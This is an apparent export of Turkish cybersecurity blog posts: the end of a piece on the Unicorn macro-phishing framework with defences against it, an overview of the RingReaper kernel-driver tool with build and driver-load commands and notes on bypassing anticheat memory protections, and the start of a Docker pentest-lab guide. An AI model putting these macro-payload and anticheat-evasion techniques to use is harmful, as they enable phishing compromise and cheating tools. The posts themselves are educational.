&ccedil;al\u0131\u015ft\u0131r\u0131ld\u0131\u011f\u0131nda Unicorn, gerekli PowerShell kodunu ve i&ccedil;ine bu kodu g&ouml;m&uuml;l&uuml; oldu\u011fu payload.txt (VBA kodu) dosyas\u0131n\u0131 olu\u015fturur. Sald\u0131rgan bu VBA kodunu bir Word makrosuna kopyalay\u0131p dosyay\u0131 kaydeder ve hedefe g&ouml;nderir.<\/p>\r\n<h2>&nbsp;Unicorn'a Kar\u015f\u0131 Nas\u0131l Korunuruz?<\/h2>\r\n<p>Unicorn'un g&uuml;c&uuml;, insan hatas\u0131na dayan\u0131r. Bu nedenle korunma y&ouml;ntemleri de teknik ve insan odakl\u0131 &ouml;nlemlerin bir birle\u015fimidir:<\/p>\r\n<p>1. &nbsp;Kullan\u0131c\u0131 E\u011fitimi (En Kritik &Ouml;nlem): &Ccedil;al\u0131\u015fanlar\u0131n\u0131z\u0131 sosyal m&uuml;hendislik ve oltalama sald\u0131r\u0131lar\u0131 konusunda s&uuml;rekli e\u011fitin. Tan\u0131mad\u0131klar\u0131 ki\u015filerden gelen, beklenmedik epostalar\u0131 ve ekleri asla a&ccedil;mamalar\u0131 gerekti\u011fini &ouml;\u011fretin. \"Makrolar\u0131 Etkinle\u015ftir\" uyar\u0131s\u0131n\u0131 g&ouml;rd&uuml;klerinde \u015f&uuml;phelenmeliler!<br>2. &nbsp;Makrolar\u0131 Devre D\u0131\u015f\u0131 B\u0131rak\u0131n: Kurumsal ortamlarda, G&uuml;venlik \u0130lkeleri (Group Policy) arac\u0131l\u0131\u011f\u0131yla t&uuml;m Microsoft Office uygulamalar\u0131nda makrolar\u0131 genel olarak devre d\u0131\u015f\u0131 b\u0131rak\u0131n. E\u011fer mutlaka gerekliyse, yaln\u0131zca imzalanm\u0131\u015f makrolara veya belirli g&uuml;venilen konumlardaki dosyalara izin verin.<br>3. &nbsp;AppLocker veya WDAC Kullan\u0131n: Windows ortamlar\u0131nda AppLocker veya Daha G&uuml;&ccedil;l&uuml; Windows Defender Uygulama Denetimi (WDAC) kullanarak, yaln\u0131zca yetkili yaz\u0131l\u0131mlar\u0131n ve betiklerin &ccedil;al\u0131\u015ft\u0131r\u0131lmas\u0131na izin verin. Bu, izinsiz bir PowerShell beti\u011finin &ccedil;al\u0131\u015fmas\u0131n\u0131 engelleyebilir.<br>4. &nbsp;PowerShell \u0130\u015flemlerini \u0130zleyin: Geli\u015fmi\u015f g&uuml;venlik &ccedil;&ouml;z&uuml;mleri (EDR &nbsp;Endpoint Detection and Response) kullanarak \u015f&uuml;pheli PowerShell komutlar\u0131n\u0131 (&ouml;rne\u011fin s\u0131k\u0131\u015ft\u0131r\u0131lm\u0131\u015f kod &ccedil;al\u0131\u015ft\u0131ran, gizli pencerede a&ccedil;\u0131lan) izleyin ve alarm &uuml;retin.<br>5. &nbsp;G&uuml;ncel Yaz\u0131l\u0131m ve Antivir&uuml;s: \u0130\u015fletim sistemi ve antivir&uuml;s yaz\u0131l\u0131mlar\u0131n\u0131z\u0131 her zaman g&uuml;ncel tutun. Yeni nesil antivir&uuml;s &ccedil;&ouml;z&uuml;mleri, davran\u0131\u015f analizi ile bu t&uuml;r sald\u0131r\u0131lar\u0131 tespit edebilme yetene\u011fine sahiptir.<\/p>\r\n<h2>&nbsp;Sonu&ccedil;<\/h2>\r\n<p>Unicorn, sosyal m&uuml;hendislik sald\u0131r\u0131lar\u0131n\u0131n ne kadar etkili ve tehlikeli olabilece\u011fini g&ouml;steren m&uuml;kemmel bir ara&ccedil;t\u0131r. Sadece birka&ccedil; sat\u0131r kodla, g&uuml;venlik fark\u0131ndal\u0131\u011f\u0131 d&uuml;\u015f&uuml;k bir kullan\u0131c\u0131 &uuml;zerinden t&uuml;m bir sistemi ele ge&ccedil;irmek m&uuml;mk&uuml;nd&uuml;r.<\/p>\r\n<p>Bu nedenle, g&uuml;venlik duvarlar\u0131n\u0131n ve antivir&uuml;s yaz\u0131l\u0131mlar\u0131n\u0131n &ouml;tesine ge&ccedil;ip, insan\u0131 \"en zay\u0131f halka\" olmaktan &ccedil;\u0131karacak s&uuml;rekli e\u011fitim ve fark\u0131ndal\u0131k &ccedil;al\u0131\u015fmalar\u0131, modern siber g&uuml;venli\u011fin olmazsa olmaz\u0131d\u0131r. Unicorn bize \u015funu hat\u0131rlat\u0131r: En g&uuml;&ccedil;l&uuml; \u015fifre, en pahal\u0131 g&uuml;venlik yaz\u0131l\u0131m\u0131 bile, bir kullan\u0131c\u0131n\u0131n yanl\u0131\u015f bir d&uuml;\u011fmeye t\u0131klamas\u0131 kadar savunmas\u0131z olabilir.<\/p>\r\n<p>&nbsp;<\/p>\r\n<p>Not: Bu yaz\u0131, Unicorn Framework'&uuml;n nas\u0131l &ccedil;al\u0131\u015ft\u0131\u011f\u0131n\u0131 anlamak ve buna kar\u015f\u0131 nas\u0131l korunulaca\u011f\u0131n\u0131 &ouml;\u011fretmek amac\u0131yla yaz\u0131lm\u0131\u015ft\u0131r. Bu bilgiler yaln\u0131zca e\u011fitim ve savunma ama&ccedil;l\u0131 kullan\u0131lmal\u0131d\u0131r. \u0130zinsiz sistemlere s\u0131zma giri\u015fimleri yasa d\u0131\u015f\u0131d\u0131r ve ciddi yasal yapt\u0131r\u0131mlarla sonu&ccedil;lanabilir.<\/p>","excerpt":"Google Hacking\/Dorking nedir? Google Hacking olarak da bilinen Google\u00a0Dorking, internette standart arama sorgular\u0131 arac\u0131l\u0131\u011f\u0131yla kolayca...","created_at":"2025-08-09 12:33:36","updated_at":"2026-09-08 00:28:40","category_id":7,"view_count":768,"reading_time":6,"status":"published","editor_choice":0,"is_editor_choice":0,"published_at":"2025-08-09 12:33:36","featured_image":"resimyok.jpg","slug":"google-dorking","category_name":"Cyber Security","category_slug":"cyber-security","category_color":"#10b981"},{"id":19,"title":"RingReaper","content":"<h1><strong>RingReaper Nedir? Windows Kernel (Ring 0) &Uuml;zerinde G&uuml;venlik Ara\u015ft\u0131rmalar\u0131 \u0130&ccedil;in G&uuml;&ccedil;l&uuml; Bir Ara&ccedil;<\/strong><\/h1>\r\n<p>Kernel seviyesi (Ring 0) g&uuml;venlik ara\u015ft\u0131rmalar\u0131, i\u015fletim sisteminin en d&uuml;\u015f&uuml;k seviyesinde ger&ccedil;ekle\u015fti\u011fi i&ccedil;in hem b&uuml;y&uuml;k bir teknik uzmanl\u0131k gerektirir hem de ciddi riskler bar\u0131nd\u0131r\u0131r. Bu alanda ara\u015ft\u0131rmac\u0131lar taraf\u0131ndan kullan\u0131lan a&ccedil;\u0131k kaynak projelerden biri de <strong>RingReaper<\/strong>&rsquo;d\u0131r.<\/p>\r\n<p>\ud83d\udc49 GitHub Projesi:<br><a href=\"https:\/\/github.com\/MatheuZSecurity\/RingReaper\">https:\/\/github.com\/MatheuZSecurity\/RingReaper<\/a><\/p>\r\n<p>RingReaper, esas olarak <strong>Windows kernel modunda &ccedil;al\u0131\u015fan bir s&uuml;r&uuml;c&uuml; (driver)<\/strong> ve bu s&uuml;r&uuml;c&uuml;yle ileti\u015fim kuran bir kullan\u0131c\u0131 modu uygulamas\u0131ndan olu\u015fur. Pek &ccedil;ok farkl\u0131 kullan\u0131m senaryosu bulunsa da projenin temel hedefi <strong>g&uuml;venlik ara\u015ft\u0131rmalar\u0131na ve anticheat analizine y&ouml;nelik kontroll&uuml; testler yapabilmektir<\/strong>.<\/p>\r\n<p>\u26a0\ufe0f <strong>&Ouml;NEML\u0130 UYARI:<\/strong><br>Bu t&uuml;r ara&ccedil;lar <em>yanl\u0131\u015f ama&ccedil;larla<\/em> kullan\u0131ld\u0131\u011f\u0131nda oyun hilelerinden zararl\u0131 yaz\u0131l\u0131m geli\u015ftirmeye kadar pek &ccedil;ok yasa d\u0131\u015f\u0131 alana kayabilir.<br><strong>Sadece e\u011fitim, analiz ve etik s\u0131zma testleri i&ccedil;in<\/strong>, tamamen <strong>izinli ortamlarda<\/strong> kullan\u0131lmal\u0131d\u0131r.<\/p>\r\n<hr>\r\n<h1>\ud83c\udfaf <strong>RingReaper&rsquo;\u0131n Kullan\u0131m Ama&ccedil;lar\u0131<\/strong><\/h1>\r\n<p>RingReaper farkl\u0131 siber g&uuml;venlik alanlar\u0131nda kullan\u0131labilir.<\/p>\r\n<h2>\u2714\ufe0f 1. <strong>Oyun G&uuml;venlik Sistemlerini Test Etme<\/strong><\/h2>\r\n<p>Pop&uuml;ler oyunlarda kullan\u0131lan anticheat yaz\u0131l\u0131mlar\u0131 (EAC, BattlEye, Vanguard vb.) kernel seviyesinde &ccedil;al\u0131\u015f\u0131r.<br>Bu ara&ccedil;lar:<\/p>\r\n<ul>\r\n<li>\r\n<p>Bellek b&uuml;t&uuml;nl&uuml;\u011f&uuml;n&uuml; korur<\/p>\r\n<\/li>\r\n<li>\r\n<p>Yetki y&uuml;kseltme giri\u015fimlerini engeller<\/p>\r\n<\/li>\r\n<li>\r\n<p>Oyun s&uuml;recine (process) yap\u0131lan m&uuml;dahaleleri alg\u0131lar<\/p>\r\n<\/li>\r\n<\/ul>\r\n<p>RingReaper, bu sistemlerin nas\u0131l tespit yapt\u0131\u011f\u0131n\u0131 incelemek ve zafiyet ara\u015ft\u0131rmalar\u0131 yapmak i&ccedil;in bir test ortam\u0131 sa\u011flar.<\/p>\r\n<hr>\r\n<h2>\u2714\ufe0f 2. <strong>Yetki Y&uuml;kseltme \/ Kernel Exploit Ara\u015ft\u0131rmalar\u0131<\/strong><\/h2>\r\n<p>Windows kernel mimarisi &uuml;zerinde:<\/p>\r\n<ul>\r\n<li>\r\n<p>Bellek eri\u015fimleri<\/p>\r\n<\/li>\r\n<li>\r\n<p>Sayfa tablosu (paging) mekanizmalar\u0131<\/p>\r\n<\/li>\r\n<li>\r\n<p>SSDT hook kontrolleri<\/p>\r\n<\/li>\r\n<li>\r\n<p>CR3 manip&uuml;lasyonu<\/p>\r\n<\/li>\r\n<li>\r\n<p>Kernel Thread davran\u0131\u015flar\u0131<\/p>\r\n<\/li>\r\n<\/ul>\r\n<p>gibi konular ara\u015ft\u0131r\u0131l\u0131r. RingReaper, ara\u015ft\u0131rmac\u0131lar\u0131n <strong>kontroll&uuml;<\/strong> bir driver ile bu davran\u0131\u015flar\u0131 g&ouml;zlemlemesini m&uuml;mk&uuml;n k\u0131lar.<\/p>\r\n<hr>\r\n<h2>\u2714\ufe0f 3. <strong>Adli Bili\u015fim (Forensic) ve Zararl\u0131 Analizi<\/strong><\/h2>\r\n<p>Kernel moduna yerle\u015fen malware &ouml;rnekleri:<\/p>\r\n<ul>\r\n<li>\r\n<p>\u0130\u015flem gizleme (DKOM)<\/p>\r\n<\/li>\r\n<li>\r\n<p>S&uuml;r&uuml;c&uuml; gizleme<\/p>\r\n<\/li>\r\n<li>\r\n<p>Bellek manip&uuml;lasyonu<\/p>\r\n<\/li>\r\n<li>\r\n<p>Rootkit teknikleri<\/p>\r\n<\/li>\r\n<\/ul>\r\n<p>gibi geli\u015fmi\u015f y&ouml;ntemler kullan\u0131r.<br>RingReaper bu davran\u0131\u015flar\u0131n sim&uuml;lasyon ve analizinde kullan\u0131labilir.<\/p>\r\n<hr>\r\n<h1>\ud83d\udd27 <strong>Teknik Yap\u0131: RingReaper Nas\u0131l &Ccedil;al\u0131\u015f\u0131yor?<\/strong><\/h1>\r\n<p>Ara&ccedil; iki ana bile\u015fenden olu\u015fur:<\/p>\r\n<p>1\ufe0f\u20e3 <strong>Kernel Driver (<code>RingReaper.sys<\/code>)<\/strong><br>2\ufe0f\u20e3 <strong>User-mode kontrol uygulamas\u0131<\/strong><\/p>\r\n<p>Kullan\u0131c\u0131 modundan kernel s&uuml;r&uuml;c&uuml;s&uuml;ne <strong>DeviceIoControl<\/strong> &uuml;zerinden komut g&ouml;nderilir.<\/p>\r\n<hr>\r\n<h2>\u26a1 <strong>Kernel Bellek Eri\u015fim Mekanizmas\u0131<\/strong><\/h2>\r\n<p>Windows, normalde bir i\u015flemin ba\u015fka bir i\u015flemin belle\u011fini okumas\u0131na izin vermez. Kernel mode bunu a\u015fabilir.<\/p>\r\n<h3>Temel Yakla\u015f\u0131m:<\/h3>\r\n<ul>\r\n<li>\r\n<p>Hedef i\u015flemin <code>EPROCESS<\/code> yap\u0131s\u0131 bulunur<\/p>\r\n<\/li>\r\n<li>\r\n<p>Kernel fonksiyonu <strong>MmCopyVirtualMemory<\/strong> kullan\u0131l\u0131r<\/p>\r\n<\/li>\r\n<li>\r\n<p>Bellek bir buffer i&ccedil;ine kopyalan\u0131r<\/p>\r\n<\/li>\r\n<\/ul>\r\n<p>Bu i\u015flem <em>sadece ara\u015ft\u0131rma ama&ccedil;l\u0131<\/em> yap\u0131lmal\u0131d\u0131r.<\/p>\r\n<p><strong>Basitle\u015ftirilmi\u015f &ouml;rnek yap\u0131sal kod (&ccedil;al\u0131\u015f\u0131r de\u011fildir, konsept g&ouml;stermek i&ccedil;indir):<\/strong><\/p>\r\n<pre><code class=\"language-c\">NTSTATUS ReadMemory(\r\n    PEPROCESS TargetProcess,\r\n    PVOID SourceAddress,\r\n    PVOID OutputBuffer,\r\n    SIZE_T Size\r\n);\r\n<\/code><\/pre>\r\n<p>Fonksiyonun amac\u0131 hedef s&uuml;recin belirli bir adres aral\u0131\u011f\u0131n\u0131 kopyalamakt\u0131r.<\/p>\r\n<hr>\r\n<h1>\ud83d\udee1\ufe0f <strong>AntiCheat Sistemlerinin Atlama Mekanizmalar\u0131 (Teorik)<\/strong><\/h1>\r\n<p>RingReaper gibi ara&ccedil;lar, ara\u015ft\u0131rma ortamlar\u0131nda anticheat sistemlerinin nas\u0131l &ccedil;al\u0131\u015ft\u0131\u011f\u0131n\u0131 g&ouml;zlemlemek i&ccedil;in kullan\u0131l\u0131r.<\/p>\r\n<h3>1\ufe0f\u20e3 <strong>Bellek Korumas\u0131n\u0131 A\u015fma Teknikleri (Analiz Ama&ccedil;l\u0131)<\/strong><\/h3>\r\n<ul>\r\n<li>\r\n<p><strong>CR3 manip&uuml;lasyonu<\/strong><br>&rarr; Hangi page table&rsquo;\u0131n aktif oldu\u011funu de\u011fi\u015ftirerek adres alanlar\u0131n\u0131 okumay\u0131 m&uuml;mk&uuml;n k\u0131lar.<\/p>\r\n<\/li>\r\n<li>\r\n<p><strong>Sayfa izinlerini de\u011fi\u015ftirme<\/strong><br>&rarr; Read-only korumalar\u0131n\u0131 devre d\u0131\u015f\u0131 b\u0131rakarak belle\u011fe yazmak m&uuml;mk&uuml;n olabilir.<\/p>\r\n<\/li>\r\n<\/ul>\r\n<h3>2\ufe0f\u20e3 <strong>Tespit Edilmeme Analizleri<\/strong><\/h3>\r\n<p>Anticheat yaz\u0131l\u0131mlar\u0131 genellikle:<\/p>\r\n<ul>\r\n<li>\r\n<p>SSDT hook kontrol&uuml;<\/p>\r\n<\/li>\r\n<li>\r\n<p>Driver imza do\u011frulamas\u0131<\/p>\r\n<\/li>\r\n<li>\r\n<p>PatchGuard izleme<\/p>\r\n<\/li>\r\n<\/ul>\r\n<p>gibi y&ouml;ntemlerle koruma sa\u011flar.<\/p>\r\n<p>Ara\u015ft\u0131rmac\u0131lar, bu sistemlerin davran\u0131\u015flar\u0131n\u0131 incelemek i&ccedil;in &ccedil;e\u015fitli kernel objelerini kontrol eder.<\/p>\r\n<h3>3\ufe0f\u20e3 <strong>G&uuml;venilir S&uuml;r&uuml;c&uuml; Abuse Tespiti<\/strong><\/h3>\r\n<p>Baz\u0131 <em>yasal<\/em> s&uuml;r&uuml;c&uuml;lerde privilege escalation zafiyetleri olabilir.<br>G&uuml;venlik ekipleri bu zafiyetleri test etmek i&ccedil;in RingReaper benzeri ara&ccedil;lar kullanabilir.<\/p>\r\n<hr>\r\n<h1>\u26a0\ufe0f <strong>Riskler ve Olas\u0131 Sonu&ccedil;lar<\/strong><\/h1>\r\n<p>Kernel seviyesinde &ccedil;al\u0131\u015fan her ara&ccedil; gibi RingReaper&rsquo;\u0131n kullan\u0131m\u0131 da ciddi riskler bar\u0131nd\u0131r\u0131r:<\/p>\r\n<h3>\u274c <strong>Sistem &Ccedil;&ouml;kmesi (BSOD)<\/strong><\/h3>\r\n<p>Yanl\u0131\u015f yap\u0131lm\u0131\u015f bir bellek i\u015flemi t&uuml;m i\u015fletim sistemini kilitleyebilir.<\/p>\r\n<h3>\u274c <strong>Oyun Hesab\u0131 Kal\u0131c\u0131 Ban<\/strong><\/h3>\r\n<p>Anticheat sistemleri kernel s&uuml;r&uuml;c&uuml;s&uuml; y&uuml;kleyen uygulamalar\u0131 agresif \u015fekilde tespit eder.<\/p>\r\n<h3>\u274c <strong>Yasal Sorunlar<\/strong><\/h3>\r\n<p>Oyunlarda hile &uuml;retmek\/kullanmak bir&ccedil;ok &uuml;lkede cezai yapt\u0131r\u0131mlara tabi olabilir.<\/p>\r\n<h3>\u2714\ufe0f <strong>En G&uuml;venli Kullan\u0131m Y&ouml;ntemi<\/strong><\/h3>\r\n<blockquote>\r\n<p><strong>Mutlaka sanal makine (VM) kullan\u0131n.<\/strong><br>Ana sistemde test yapmak veri kayb\u0131 ve sistem hatalar\u0131na yol a&ccedil;abilir.<\/p>\r\n<\/blockquote>\r\n<hr>\r\n<h1>\ud83d\udee0\ufe0f <strong>Kurulum ve &Ccedil;al\u0131\u015ft\u0131rma (G&uuml;venli Test Senaryosu)<\/strong><\/h1>\r\n<h2>Gereksinimler:<\/h2>\r\n<ul>\r\n<li>\r\n<p>Visual Studio<\/p>\r\n<\/li>\r\n<li>\r\n<p>Windows Driver Kit (WDK)<\/p>\r\n<\/li>\r\n<li>\r\n<p>Test yaz\u0131l\u0131m sertifikas\u0131 veya Test Mode<\/p>\r\n<\/li>\r\n<li>\r\n<p>Sanal makine (VMware\/Hyper-V\/VirtualBox)<\/p>\r\n<\/li>\r\n<\/ul>\r\n<h3>Ad\u0131mlar:<\/h3>\r\n<pre><code class=\"language-powershell\">git clone https:\/\/github.com\/MatheuZSecurity\/RingReaper.git\r\ncd RingReaper\r\n<\/code><\/pre>\r\n<p>Visual Studio ile <code>RingReaper.sln<\/code> dosyas\u0131n\u0131 a&ccedil;\u0131p derleyebilirsiniz.<\/p>\r\n<p>Driver, test ama&ccedil;l\u0131 \u015fu \u015fekilde y&uuml;klenir:<\/p>\r\n<pre><code class=\"language-powershell\">sc create RingReaper binPath= C:\\Test\\RingReaper.sys type= kernel\r\nsc start RingReaper\r\n<\/code><\/pre>\r\n<blockquote>\r\n<p><strong>Not:<\/strong> Modern Windows s&uuml;r&uuml;mleri imzas\u0131z driver&rsquo;lar\u0131 engeller.<br>Bu nedenle test modunda veya Debug VM ortam\u0131nda &ccedil;al\u0131\u015ft\u0131r\u0131lmal\u0131d\u0131r.<\/p>\r\n<\/blockquote>\r\n<hr>\r\n<h1>\ud83d\udd04 <strong>Alternatif Kernel Ara\u015ft\u0131rma Ara&ccedil;lar\u0131<\/strong><\/h1>\r\n<table>\r\n<thead>\r\n<tr>\r\n<th>Ara&ccedil;<\/th>\r\n<th>Ama&ccedil;<\/th>\r\n<\/tr>\r\n<\/thead>\r\n<tbody>\r\n<tr>\r\n<td><strong>KD (WinDbg)<\/strong><\/td>\r\n<td>Kernel debugging<\/td>\r\n<\/tr>\r\n<tr>\r\n<td><strong>HyperDbg<\/strong><\/td>\r\n<td>Hypervisor tabanl\u0131 debugger<\/td>\r\n<\/tr>\r\n<tr>\r\n<td><strong>Process Hacker 2 (Kernel moduyla)<\/strong><\/td>\r\n<td>Bellek ve s&uuml;re&ccedil; takibi<\/td>\r\n<\/tr>\r\n<tr>\r\n<td><strong>PCHunter \/ Gmer<\/strong><\/td>\r\n<td>Rootkit analiz ara&ccedil;lar\u0131<\/td>\r\n<\/tr>\r\n<\/tbody>\r\n<\/table>\r\n<hr>\r\n<h1>\ud83d\udd0e <strong>Teorik Bir Senaryo: Oyun G&uuml;venli\u011fi Testi<\/strong><\/h1>\r\n<p>Bu, <em>tamamen etik hacking ve ara\u015ft\u0131rma ama&ccedil;l\u0131<\/em> bir &ouml;rnektir:<\/p>\r\n<ol>\r\n<li>\r\n<p>Hedef oyunun PID&rsquo;si al\u0131n\u0131r<\/p>\r\n<\/li>\r\n<li>\r\n<p>Bellek b&ouml;lgeleri taran\u0131r<\/p>\r\n<\/li>\r\n<li>\r\n<p>Sa\u011fl\u0131k\/mermi gibi de\u011fi\u015fkenlerin adresleri analiz edilir<\/p>\r\n<\/li>\r\n<li>\r\n<p>AntiCheat mekanizmalar\u0131n\u0131n bu eri\u015fimi nas\u0131l izledi\u011fi test edilir<\/p>\r\n<\/li>\r\n<\/ol>\r\n<p>Ama&ccedil; <strong>hile yapmak de\u011fil<\/strong>, anticheat sisteminin hangi davran\u0131\u015flar\u0131 izledi\u011fini anlamakt\u0131r.<\/p>\r\n<hr>\r\n<h1>\ud83d\udccc <strong>Sonu&ccedil;<\/strong><\/h1>\r\n<p>RingReaper, kernel seviyesinde &ccedil;al\u0131\u015fan &ccedil;ok g&uuml;&ccedil;l&uuml; bir g&uuml;venlik ara\u015ft\u0131rma arac\u0131d\u0131r ve \u015fu alanlarda kullan\u0131labilir:<\/p>\r\n<p>\u2714 Oyun g&uuml;venlik testleri<br>\u2714 Kernel exploit ara\u015ft\u0131rmas\u0131<br>\u2714 Zararl\u0131 yaz\u0131l\u0131m analizi<br>\u2714 Anticheat davran\u0131\u015f incelemesi<\/p>\r\n<p>Ancak:<\/p>\r\n<p>\u274c Yanl\u0131\u015f ama&ccedil;larla kullanmak hem etik d\u0131\u015f\u0131d\u0131r hem de yasal olarak cezaland\u0131r\u0131l\u0131r.<br>\u274c Kernel modunda yap\u0131lan her hata sistem &ccedil;&ouml;kmesine yol a&ccedil;abilir.<\/p>\r\n<p>Bu nedenle <strong>yaln\u0131zca izinli test ortamlar\u0131nda<\/strong>, <strong>sanal makine &uuml;zerinde<\/strong> kullan\u0131lmas\u0131 \u015fiddetle tavsiye edilir.<\/p>\r\n<hr>\r\n<h1>\ud83d\udcda Daha Fazla &Ouml;\u011frenmek \u0130steyenler \u0130&ccedil;in<\/h1>\r\n<ul>\r\n<li>\r\n<p><em>Windows Kernel Programming<\/em> &ndash; Pavel Yosifovich<\/p>\r\n<\/li>\r\n<li>\r\n<p>Microsoft WDK Belgeleri<\/p>\r\n<\/li>\r\n<li>\r\n<p>Hypervisor + Kernel Debugging rehberleri<\/p>\r\n<\/li>\r\n<li>\r\n<p>Malware &amp; Rootkit ara\u015ft\u0131rma topluluklar\u0131<\/p>\r\n<\/li>\r\n<\/ul>\r\n<hr>\r\n<p>&nbsp;<\/p>\r\n<p>&nbsp;<\/p>","excerpt":"RingReaper, Windows'ta kernel modunda (Ring 0) \u00e7al\u0131\u015fan ve \u015fu ama\u00e7larla kullan\u0131lan bir g\u00fcvenlik ara\u015ft\u0131rma\/penetrasyon testi arac\u0131d\u0131r:","created_at":"2025-07-25 12:22:41","updated_at":"2026-09-08 02:16:50","category_id":7,"view_count":1009,"reading_time":6,"status":"published","editor_choice":0,"is_editor_choice":1,"published_at":"2025-07-25 12:22:00","featured_image":"67b4f1588438ddcc61003079a0e7c75b.png","slug":"ringreaper","category_name":"Cyber Security","category_slug":"cyber-security","category_color":"#10b981"},{"id":35,"title":"Docker ile Web Uygulama Pentest Laboratuvar\u0131 Kurma","content":"<h1>Web Lab Docker &mdash; Docker ile Esnek Bir Web Uygulama Pentest Laboratuvar\u0131 Kurma Rehberi<\/h1>\r\n<p><strong>Giri\u015f<\/strong><br>Siber g&uuml;venlik, &ouml;zellikle web uygulama g&uuml;venli\u011fi alan\u0131nda pratik beceri her \u015feydir. Teorik bilgiyi peki\u015ftirmenin ve zafiyetleri ger&ccedil;ek d&uuml;nya senaryolar\u0131nda ke\u015ffetmenin en etkili yolu, kendinize ait bir laboratuvar ortam\u0131 kurmakt\u0131r. Bu rehberde, Ignitetechnologies&rsquo;in siber g&uuml;venlik yol haritalar\u0131ndan ilham alarak Docker kullan\u0131m\u0131yla nas\u0131l h\u0131zl\u0131, esnek ve ta\u015f\u0131nabilir bir web uygulama s\u0131zma testi (pentest) laboratuvar\u0131 kurabilece\u011finizi ad\u0131m ad\u0131m ele alaca\u011f\u0131z.<\/p>\r\n<hr>\r\n<h2>Neden Bir Pentest Laboratuvar\u0131na \u0130htiyac\u0131n\u0131z Var?<\/h2>\r\n<p>Kendi laboratuvar\u0131n\u0131zda &ccedil;al\u0131\u015fmak size \u015funlar\u0131 sa\u011flar:<\/p>\r\n<ul>\r\n<li>\r\n<p>SQL Injection, XSS, CSRF gibi farkl\u0131 zafiyet t&uuml;rlerini g&uuml;venli ortamda test etme imk&acirc;n\u0131.<\/p>\r\n<\/li>\r\n<li>\r\n<p>Burp Suite, OWASP ZAP, Nmap gibi ara&ccedil;lar\u0131n ger&ccedil;ek kullan\u0131m\u0131n\u0131 &ouml;\u011frenme.<\/p>\r\n<\/li>\r\n<li>\r\n<p>&ldquo;K\u0131rm\u0131z\u0131 tak\u0131m&rdquo; (sald\u0131r\u0131) ve &ldquo;mavi tak\u0131m&rdquo; (savunma) perspektiflerini kar\u015f\u0131la\u015ft\u0131rma.<\/p>\r\n<\/li>\r\n<li>\r\n<p>Yeni ke\u015ffedilen zafiyetleri (zero-day v.b.) deneysel olarak analiz etme.<\/p>\r\n<\/li>\r\n<\/ul>\r\n<hr>\r\n<h2>Neden Docker?<\/h2>\r\n<p>Geleneksel VM tabanl\u0131 laboratuvarlar s\u0131k kaynak harcar ve kurulumu uzun s&uuml;rer. Docker ise:<\/p>\r\n<ul>\r\n<li>\r\n<p><strong>H\u0131z ve hafiflik<\/strong>: Konteynerler saniyeler i&ccedil;inde ba\u015flar, az disk\/RAM kullan\u0131r.<\/p>\r\n<\/li>\r\n<li>\r\n<p><strong>Ta\u015f\u0131nabilirlik<\/strong>: Dockerfile \/ docker-compose ile t&uuml;m ortam kod olarak ta\u015f\u0131n\u0131r.<\/p>\r\n<\/li>\r\n<li>\r\n<p><strong>\u0130zolasyon<\/strong>: Her uygulama izole konteynerde &ccedil;al\u0131\u015f\u0131r; hatalar yay\u0131lmaz.<\/p>\r\n<\/li>\r\n<li>\r\n<p><strong>Haz\u0131r ekosistem<\/strong>: Docker Hub&rsquo;da DVWA, bWAPP, Juice Shop gibi haz\u0131r zafiyetli uygulamalar bulunur.<\/p>\r\n<\/li>\r\n<\/ul>\r\n<hr>\r\n<h2>Laboratuvar Tasla\u011f\u0131 &mdash; Ak\u0131l Haritas\u0131 Ad\u0131mlar\u0131<\/h2>\r\n<p>Ignitetechnologies&rsquo;in &ldquo;Web App Docker&rdquo; ak\u0131l haritas\u0131ndan yola &ccedil;\u0131karak temel bile\u015fenler \u015funlard\u0131r:<\/p>\r\n<h3>1. Temel Bile\u015fenler<\/h3>\r\n<ul>\r\n<li>\r\n<p><strong>Sald\u0131rgan Makinesi (Attacker Machine)<\/strong>: Kali Linux veya Parrot OS tabanl\u0131 bir konteyner; Metasploit, Nmap, Burp Suite, sqlmap gibi ara&ccedil;lar\u0131 i&ccedil;erir.<\/p>\r\n<\/li>\r\n<li>\r\n<p><strong>Hedef Uygulamalar (Target Applications)<\/strong>: Pratik i&ccedil;in &ouml;rnek uygulamalar:<\/p>\r\n<ul>\r\n<li>\r\n<p><strong>OWASP Juice Shop<\/strong> &mdash; modern JS uygulama zafiyetleri.<\/p>\r\n<\/li>\r\n<li>\r\n<p><strong>DVWA (Damn Vulnerable Web Application)<\/strong> &mdash; PHP\/MySQL temelli klasik zafiyetler.<\/p>\r\n<\/li>\r\n<li>\r\n<p><strong>bWAPP<\/strong> &mdash; 100&rsquo;den fazla zafiyet.<\/p>\r\n<\/li>\r\n<li>\r\n<p><strong>WebGoat<\/strong> &mdash; OWASP taraf\u0131ndan haz\u0131rlanm\u0131\u015f interaktif e\u011fitim uygulamas\u0131.<\/p>\r\n<\/li>\r\n<\/ul>\r\n<\/li>\r\n<\/ul>\r\n<h3>2. A\u011f Yap\u0131land\u0131rmas\u0131<\/h3>\r\n<ul>\r\n<li>\r\n<p><code>docker-compose<\/code> ile t&uuml;m konteynerleri tek bir <strong>bridge network<\/strong> i&ccedil;inde &ccedil;al\u0131\u015ft\u0131r. Bu, sald\u0131rgan makinesinin hedeflere eri\u015fimini kolayla\u015ft\u0131r\u0131r ve ayn\u0131 zamanda laboratuvar\u0131 ana sistemden izole eder.<\/p>\r\n<\/li>\r\n<\/ul>\r\n<h3>3. Kurulum ve Ba\u015flatma<\/h3>\r\n<ul>\r\n<li>\r\n<p>T&uuml;m servisleri <code>docker-compose.yml<\/code> i&ccedil;inde tan\u0131mla.<\/p>\r\n<\/li>\r\n<li>\r\n<p>Laboratuvar\u0131 aya\u011fa kald\u0131r: <code>docker-compose up -d<\/code><\/p>\r\n<\/li>\r\n<li>\r\n<p>Laboratuvar\u0131 durdur: <code>docker-compose down<\/code><\/p>\r\n<\/li>\r\n<\/ul>\r\n<hr>\r\n<h2>G&uuml;venlik ve Sorumluluk<\/h2>\r\n<ul>\r\n<li>\r\n<p>Laboratuvar\u0131 yaln\u0131zca <strong>izole bir a\u011fda<\/strong> &ccedil;al\u0131\u015ft\u0131r; internet&rsquo;e a&ccedil;\u0131k hale getirme.<\/p>\r\n<\/li>\r\n<li>\r\n<p>&Ouml;\u011frenme ama&ccedil;l\u0131 bile olsa, ger&ccedil;ek hedeflere izinsiz sald\u0131rma yasa d\u0131\u015f\u0131d\u0131r. Her zaman yasal ve etik kurallara uy.<\/p>\r\n<\/li>\r\n<\/ul>\r\n<hr>\r\n<h2>Pratik \u0130pu&ccedil;lar\u0131<\/h2>\r\n<ul>\r\n<li>\r\n<p><strong>S&uuml;r&uuml;m kontrol&uuml;:<\/strong> <code>docker-compose.yml<\/code> 